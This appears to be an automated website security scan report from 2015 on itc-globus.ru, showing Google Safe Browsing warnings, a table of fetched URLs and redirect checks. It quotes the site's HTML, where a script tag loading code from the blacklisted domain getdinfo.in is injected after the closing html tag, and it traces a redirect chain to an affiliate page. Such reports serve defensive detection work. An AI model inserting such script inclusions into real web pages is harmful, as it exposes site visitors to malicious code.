Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=itc-globus.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://itc-globus.ru/ | 200 OK Content-Length: 14707 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: getdinfo.in ...[4862 bytes skipped]... " width="88" alt="Ðåéòèíã@Mail.ru"/></a></noscript> <script language="JavaScript" type="text/javascript"><!-- if(11<js)d.write('--'+'>')//--></script><!--/COUNTER--> </span></font></div> </div> </body> </html> <script src="http://getdinfo.in/js.js"></script> | ||
http://getdinfo.in/js.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/./images/www-widgetapi.js | 200 OK Content-Length: 23562 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/jquery-1.8.3.min.js | 200 OK Content-Length: 93636 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/jquery.fancybox.pack.js | 200 OK Content-Length: 23135 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 1384 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/player_api | 200 OK Content-Length: 717 Content-Type: text/plain | clean |
http://getdinfo.in/test404page.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/./images/scripts.js | 200 OK Content-Length: 622 Content-Type: text/javascript | clean |
http://getdinfo.in/ndex.php | HTTP/1.1 302 Found Connection: close Date: Thu, 22 Jan 2015 13:23:26 GMT Location: http://u-bot.ru/reg.php?reg_lang=ru&aff_id=1&aff_sub=mahakteddoottruddeell181ddeell42 Server: Apache/2.2.15 (CentOS) Content-Length: 3 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | clean |
http://u-bot.ru/reg.php?reg_lang=ru&aff_id=1&aff_sub=mahakteddoottruddeell181ddeell42 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 22 Jan 2015 13:24:47 GMT Location: reg.php Server: cloudflare-nginx Content-Type: text/html CF-RAY: 1acc12e3b8ff05c3-WAW Set-Cookie: __cfduid=df9222362094a2897e12e722cda6403b91421933087; expires=Fri, 22-Jan-16 13:24:47 GMT; path=/; domain=.u-bot.ru; HttpOnly Set-Cookie: lang=ru; expires=Sun, 22-Feb-2015 13:25:15 GMT Set-Cookie: aff_id=1; expires=Sat, 21-Feb-2015 13:25:15 GMT Set-Cookie: aff_sub=mahakteddoottruddeell181ddeell42; expires=Sat, 21-Feb-2015 13:25:15 GMT X-Powered-By: PHP/5.3.3 | clean |
http://u-bot.ru/reg.php | 200 OK Content-Length: 190691 Content-Type: text/html | clean |
http://u-bot.ru/ubot_media/js/jquery-1.8.3.min.js | 200 OK Content-Length: 93637 Content-Type: application/x-javascript | clean |
http://getdinfo.in/ubot_media/js/jquery.bxslider.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/ubot_media/js/./images/www-widgetapi.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/ubot_media/js/./images/./images/www-widgetapi.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/ubot_media/js/./images/./images/./images/www-widgetapi.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: itc-globus.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 13:23:48 GMT
Server: nginx/0.6.34
Content-Language: ru
Content-Type: text/html
GET / HTTP/1.1
Host: itc-globus.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 13:23:48 GMT
Server: nginx/0.6.34
Content-Language: ru
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: itc-globus.ru
Referer: http://www.google.com/search?q=itc-globus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: itc-globus.ru
Referer: http://www.google.com/search?q=itc-globus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.